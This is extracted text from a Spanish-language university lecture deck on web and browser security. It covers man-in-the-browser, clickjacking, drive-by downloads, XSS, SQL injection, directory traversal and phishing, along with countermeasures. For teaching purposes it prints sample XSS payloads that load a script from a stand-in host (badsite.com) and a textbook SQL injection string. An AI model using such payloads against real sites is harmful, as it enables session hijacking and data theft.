Upload
others
View
0
Download
0
Embed Size (px)
Citation preview
1
SEGURIDAD INFORMÁTICA
UNTDF – IDEI | Profesor Lic. Leonardo de - Matteis | 2019/1c
La web y los usuarios
IDEI | 2019-1c | 2 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Temario
Ataques contra navegadores
Sitios web falsos y maliciosos
Ataques dirigidos a datos sensibles
Ataques de inyección de código
Spam (correo no deseado)
Suplantación de identidad (phishing)
IDEI | 2019-1c | 3 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Vulnerabilidades en navegadores
Los navegadores se han convertido de muchas maneras en nuestros
nuevos sistemas operativos.
1000
900
800
700
600
500
400
300
200
100
02008 2009 2010 2011 2012 2013
208 207
441
731
897
727
IDEI | 2019-1c | 4 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Navegadores
Tipos de ataques:
Man in the browser
Keystroke logger (registrador de teclas pulsadas)
Página en el medio (page in the middle)
Programa de sustitución de descarga.
Usuario en el medio (user in the middle)
IDEI | 2019-1c | 5 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a navegadores: man in the browser
Ejemplo: Win32/Silentbanker.A
Troyano instalado como complemento del navegador. Cuando detectaba que el usuario accedía a una URL bancaria, interceptaba las pulsaciones e incluso las modificaba para que las transferencias de dinero fueran a cuentas de los atacantes. También realizaba capturas de pantallas.
User typesBrowser
encrypts
Encrypted data
transferred to
bank
SilentBanker
intercepts
BANK
IDEI | 2019-1c | 6 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a navegadores: man in the browser
Recomendaciones/limpieza:
“La extracción manual no se recomienda para esta amenaza. Para
detectar y eliminar esta amenaza y otro software malintencionado
que se haya instalado, ejecute un análisis completo del sistema
con un producto antivirus actualizado.”
2
IDEI | 2019-1c | 7 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a navegadores: keystroke logger
Características:
Hardware o software que registra todas las pulsaciones.
Puede ser un dongle pequeño conectado a un puerto USB o
puede hacerse pasar por un teclado.
También se puede instalar como malware.
No se encuentra limitado a afectar navegadores.
IDEI | 2019-1c | 8 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a navegadores: page in the middle
Características:
El usuario se dirige a una página diferente de la que se cree o se
pretende.
Efecto similar al de un hombre en el navegador, donde el
atacante puede interceptar y modificar la entrada del usuario.
IDEI | 2019-1c | 9 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a navegadores: programa de sustitución de descarga
Características:
El atacante crea una página con programas aparentemente
inocuos y deseables para descargar.
En lugar de, o además de, la funcionalidad deseada, el usuario
termina descargando e instalando un malware.
Técnica muy común para el spyware.
IDEI | 2019-1c | 10 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a navegadores: user in the middle
Características:
Uso de click-bait (ciber anzuelos) para engañar a los usuarios
para que resuelvan los CAPTCHA en nombre de los spammers.
Ejemplo: titulares de prensa o propagandas apuntan a explotar
la curiosidad del usuario. Proporcionan información parcial y
suficiente para provocar el seguimiento de un determinado
enlace.
IDEI | 2019-1c | 11 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a navegadores: user in the middle
Características:
Sitios web de CAPTCHA son utilizados para vencer la
automatización.
Ejemplo: para evitar que spammers creen secuencias de
comandos en la creación de masiva de cuentas de en un sitio de
correo electrónico.
Los atacantes pueden derrotar a los CAPTCHA a gran escala.
Diseñando sitios web ficticios para incitar a los usuarios a
resolver CAPTCHA de sistemas de terceros.
IDEI | 2019-1c | 12 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Autenticación exitosa
Los ataques enumerados son en gran parte fallos de autenticación.
Se puede mitigar con:
Secreto compartido
Contraseña de una sola vez
Comunicación fuera de banda
Ejemplos: Tokens (SecurID), segundo factor de autenticación
(Google, Microsoft, Facebook, etc.) y códigos de mensajes de texto
(PIN, SMS, etc.). Firma de controladores (drivers).
3
IDEI | 2019-1c | 13 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: fake site
IDEI | 2019-1c | 14 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: fake site
IDEI | 2019-1c | 15 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: fake site
IDEI | 2019-1c | 16 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: fake site
IDEI | 2019-1c | 17 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: fake code
Sitio de descarga de software destinado a engañar a los usuarios para que descarguen que contienen algún tipo de malware.
IDEI | 2019-1c | 18 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: seguimiento (tracking bug)
Una pequeña imagen en un
servidor específico que permite
realizar un seguimiento del
comportamiento del usuario en
muchos sitios web con fines
publicitarios.
Esta técnica también se utiliza
para rastrear la lectura de los
correos electrónicos con
publicidades.
Florist Bakery
Targeted ad
3
21
Visit from 200.100.1.10 Visit from 200.100.1.10
ClicksRUs
Web
bugs
4
IDEI | 2019-1c | 19 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: clickjacking
Características:
Forma de engañar a los usuarios para que proporcionen la
información deseada.
Un atacante confecciona un objeto/diálogo de entrada
transparente y coloca una imagen con una incitación debajo de
dicho objeto.
Un usuario termina respondiendo una pregunta que ni siquiera
sabía que se le estaba realizando, entonces autoriza al
programa a ejecutar una acción (según el objetivo/voluntad del
atacante).
IDEI | 2019-1c | 20 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: clickjacking
Características:
El uso de encuadres: iframes/divs en HTML es un componente
importante utilizado para este tipo ataque.
Do you want to perform
this dangerous act?
[Yes] [No]
For a Free Prize
Click
[Here]
IDEI | 2019-1c | 21 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: clickjacking
Acciones con las que un usuario no estaría de acuerdo:
¿Realmente quieres borrar todos tus archivos?
¿Realmente quieres instalar este programa?
¿Realmente desea cambiar su contraseña a: AZAZAZ?
¿Realmente desea permitir que cualquiera tenga acceso de
escritura a su perfil?
IDEI | 2019-1c | 22 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: clickjacking
IDEI | 2019-1c | 23 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: clickjacking
IDEI | 2019-1c | 24 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: clickjacking
5
IDEI | 2019-1c | 25 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: drive by download
Características:
El código se descarga, instala y ejecuta en un equipo sin el
conocimiento del usuario.
Puede ser el resultado de:
clickjacking,
código falso,
Sustitución en la descarga de programas,
otros.
IDEI | 2019-1c | 26 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: drive by download
Ejemplo: barras de herramientas para el navegador no deseadas.
IDEI | 2019-1c | 27 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: drive by download
¿limpieza?
IDEI | 2019-1c | 28 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: cross site scripting (XSS)
Características:
Engañar a un cliente o servidor para que ejecute código de
scripting.
Inclusión de código en elementos de una página que se utilizan
para ingreso de datos. Usualmente código en Javascript.
Scripts y tags HTML se codifican como texto sin formato al igual
que las entradas del usuario, por lo que pueden controlar
páginas web de la misma manera que los ataques de
desbordamiento de buffer pueden controlar los programas.
IDEI | 2019-1c | 29 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: cross site scripting (XSS)
IDEI | 2019-1c | 30 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: cross site scripting (XSS)
Ejemplos:
� Cool<br>story.<br>KCTVBigFan<script
src=http://badsite.com/xss.js></script>
� http://www.google.com/search?name=<SCRIPT
SRC=http://badsite.com/xss.js></SCRIPT>&q=cross+site+s
cripting&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-
US:official&client=firefox-a&lr=lang_en
6
IDEI | 2019-1c | 31 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: cross site scripting (XSS)
IDEI | 2019-1c | 32 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: cross site scripting (XSS)
Consecuencias asociadas al uso de código malicioso en un lenguaje
de scripting abarcan el diseño de diferentes tipos de ataques:
Robo cookies asociadas a un sitio web.
Keylogging
Phishing
Hijack de sesiones de usuario.
IDEI | 2019-1c | 33 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: inyección de código SQL
Características:
Inyectar código SQL en un intercambio entre una aplicación y su
servidor de base de datos.
Ejemplo:
� QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + " '; “
� QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1'; "
IDEI | 2019-1c | 34 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: inyección de código SQL
IDEI | 2019-1c | 35 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: inyección de código SQL
IDEI | 2019-1c | 36 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: inyección de código SQL
7
IDEI | 2019-1c | 37 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: inyección de código SQL
IDEI | 2019-1c | 38 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: inyección de código SQL
IDEI | 2019-1c | 39 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Ataques a sitios web: dot dot slash (../)
Características:
Conocido como "recorrido de directorios“. Ocurre cuando los
atacantes utilizan los caracteres: "../" para acceder a los
archivos que se encuentran en el servidor web de destino pero
que no están destinados a ser accedidos desde el exterior.
Con mayor frecuencia utilizado vía especificación de URL, pero
también se puede combinar con otros ataques, como XSS.
Ejemplo:
IDEI | 2019-1c | 40 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Contramedidas y prevención de ataques de inyección
Filtrar y “limpiar” todos los datos ingresados por el usuario.
Tener en cuenta cada codificación potencialmente válida.
No hacer suposiciones sobre el rango de posibles entradas del
usuario: no confiar en nada, verificar todo.
Utilizar mecanismos de control de acceso en los servidores,
ejemplo: procedimientos almacenados.
IDEI | 2019-1c | 41 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Server side include (SSI)
Características:
Lenguaje de scripting interpretado del lado del servidor.
Se puede usar para ejecutar directivas básicas del servidor web,
como incluir archivos y ejecutar comandos.
Algunos sitios web son vulnerables a permitir que los usuarios
ejecuten directivas SSI a través de entrada de texto no
validadas o revisadas en forma correcta.
Ejemplo:
IDEI | 2019-1c | 42 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Contramedidas para prevenir ataques de inyección de código
Filtrar y sanear todas las entradas que pueda proveer un
usuario.
Necesidad de tener en cuenta cada codificación de texto
potencialmente válida.
No realizar suposiciones sobre el rango de posibles entradas. No
confiar en nada. Verificar absolutamente todo.
Utilizar mecanismos de control de acceso en los programas que
deben ejecutarse del lado del servidor (backend). Ejemplo:
procedimientos almacenados.
8
IDEI | 2019-1c | 43 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Correo electrónico no deseado
Se estima que del 60% al 90% de todo el correo electrónico es
spam.
Tipos de spam:
Ofertas y publicidad de diversos productos.
Suplantación de identidad (phishing).
Solicitudes de ayuda.
Código malicioso.
Enlaces a sitios desde donde se descargará malware.
IDEI | 2019-1c | 44 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Correo electrónico no deseado
Contramedidas:
Filtros de correo electrónico suelen ser efectivos para la gran
mayoría del spam recibido.
Los proveedores de servicios de Internet establecen limitaciones
de volumen y tamaño para dificultar el trabajo de spammers.
Existen leyes contra el spam, pero en general son ineficaces.
IDEI | 2019-1c | 45 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Correo electrónico no deseado: phishing
Características:
Mensaje que trata de engañar a una víctima para que brinde
información privada o sea inducida a realizar una acción
insegura.
Pueden definirse ataques dirigidos y personalizados a ciertos
destinatarios con características determinadas. Ejemplo: spear
phishing.
IDEI | 2019-1c | 46 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Correo electrónico no deseado: phishing
IDEI | 2019-1c | 47 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Correo electrónico no deseado: phishing
IDEI | 2019-1c | 48 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Correo electrónico no deseado: phishing
9
IDEI | 2019-1c | 49 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Correo electrónico no deseado: phishing
IDEI | 2019-1c | 50 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Correo electrónico no deseado: phishing
Contramedidas:
Educación de los usuarios:
Desventaja: efectividad limitada y muy sujeta a la evolución y
efectividad de los engaños.
PGP y S/MIME:
Soluciones criptográficas. De baja adopción después de años en
el mercado.
IDEI | 2019-1c | 51 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur
Seguridad InformáticaLa web y los usuarios
Resumen
Los navegadores son una herramienta de trabajo esencial para
los usuarios, por lo tanto son uno de los objetivos más
importantes para diversos tipos de ataques.
Las debilidades de los navegadores y sitios web a menudo son
el resultado de algún tipo de autenticación deficiente.
Los atacantes se enfocan en engañar a los usuarios con sitios
web falsos, aplicaciones engañosas y correos electrónicos para
concretar ataques suplantación de identidad (phishing).
Del lado del servidor los ataques de inyección son un aspecto
clave a tener en cuenta y las medidas para prevenirlos son
críticas.